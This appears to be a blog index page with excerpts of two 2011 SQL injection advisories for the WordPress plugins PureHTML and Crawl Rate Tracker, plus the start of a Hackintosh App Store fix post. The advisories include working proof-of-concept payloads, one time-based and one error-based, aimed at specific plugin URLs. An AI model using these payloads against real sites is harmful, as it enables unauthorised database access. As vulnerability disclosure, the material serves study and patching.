WordPress PureHTML plugin

06/09/2011 0 Comments

# Exploit Title: WordPress PureHTML plugin <= 1.0.0 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip
# Version: 1.0.0 (tested)
# Note: magic_quotes has to be turned off

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/pure-html/alter.php
PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(!isset($_POST['PureHTMLNOnce'])){
    if ( !wp_verify_nonce( $_POST['PureHTMLNOnce'], …

WordPress Crawl Rate Tracker plugin

06/09/2011 0 Comments

# Exploit Title: WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip
# Version: 2.0.2 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20

---------------
Vulnerable code
---------------
class b3_chartData extends b3_sbTrackingConfig { …

How to fix the App Store problem | error on a Hackintosh | Mac OS X Lion

02/08/2011 86 Comments

Hi everyone, all good? Today I'm going to give some possible solutions for a problem that, from what I've seen, has been happening frequently since the appearance of a certain Lion that our dear Apple released…. “Your device or computer could not be verified.Contact support for assistance help” With Mac OS X Lion, simply all …